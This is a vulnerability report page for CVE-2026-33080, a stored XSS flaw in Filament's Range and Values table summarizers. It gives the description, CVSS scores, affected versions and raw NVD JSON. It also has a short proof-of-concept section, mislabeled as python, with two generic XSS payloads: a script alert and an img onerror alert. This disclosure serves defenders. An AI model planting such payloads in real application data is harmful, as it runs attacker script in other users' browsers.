Security Vulnerability Report
中文
CVE-2026-33080 CVSS 7.3 HIGH

CVE-2026-33080

Published: 2026-03-20 09:16:16
Last Modified: 2026-03-23 15:43:49
Source: [email protected]

Description

Filament is a collection of full-stack components for accelerated Laravel development. Versions 4.0.0 through 4.8.4 and 5.0.0 through 5.3.4 have two Filament Table summarizers (Range, Values) that render raw database values without escaping HTML. If there is a lack of validation for the data in the columns that use these summarizers, an attacker could plant malicious HTML / JavaScript and achieve stored XSS that executes for users who view the table with those summarizers. This issue has been patched in versions 4.8.5 and 5.3.5.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:filamentphp:filament:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:filamentphp:filament:*:*:*:*:*:*:*:* - VULNERABLE
Filament 4.0.0 至 4.8.4
Filament 5.0.0 至 5.3.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2026-33080 --> <!-- Step 1: Attacker injects payload into a database field used by a Filament Table Summarizer (Range or Values) --> <!-- Payload to be stored in the database --> <script>alert('CVE-2026-33080 Stored XSS');</script> <!-- Alternatively, using an image tag to bypass some filters --> <img src=x onerror=alert('XSS')> <!-- Step 2: Trigger --> <!-- When an administrator or user views a table in the Filament panel that uses the 'Values' or 'Range' summarizer on the compromised column, the raw HTML is rendered directly without escaping. --> <!-- The JavaScript executes immediately in the victim's browser context. -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33080", "sourceIdentifier": "[email protected]", "published": "2026-03-20T09:16:16.050", "lastModified": "2026-03-23T15:43:48.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Filament is a collection of full-stack components for accelerated Laravel development. Versions 4.0.0 through 4.8.4 and 5.0.0 through 5.3.4 have two Filament Table summarizers (Range, Values) that render raw database values without escaping HTML. If there is a lack of validation for the data in the columns that use these summarizers, an attacker could plant malicious HTML / JavaScript and achieve stored XSS that executes for users who view the table with those summarizers. This issue has been patched in versions 4.8.5 and 5.3.5."}, {"lang": "es", "value": "Filament es una colección de componentes full-stack para el desarrollo acelerado de Laravel. Las versiones 4.0.0 a 4.8.4 y 5.0.0 a 5.3.4 tienen dos resumidores de tabla de Filament (Rango, Valores) que renderizan valores brutos de la base de datos sin escapar HTML. Si hay una falta de validación para los datos en las columnas que usan estos resumidores, un atacante podría insertar HTML / JavaScript malicioso y lograr XSS almacenado que se ejecuta para los usuarios que ven la tabla con esos resumidores. Este problema ha sido parcheado en las versiones 4.8.5 y 5.3.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filamentphp:filament:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.8.5", "matchCriteriaId": "0F3FBF1F-313F-4C97-99DE-B68F6FC8B793"}, {"vulnerable": true, "criteria": "cpe:2.3:a:filamentphp:filament:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.3.5", "matchCriteriaId": "83E21510-3935-49E1-82E7-DFD7443BB37B"}]}]}], "references": [{"url": "https://github.com/filamentphp/filament/commit/efa041aeeb4b1a99acd48aaa05584993c926d1ed", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/filamentphp/filament/releases/tag/v4.8.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/filamentphp/filament/releases/tag/v5.3.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/filamentphp/filament/security/advisories/GHSA-vv3x-j2x5-36jc", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.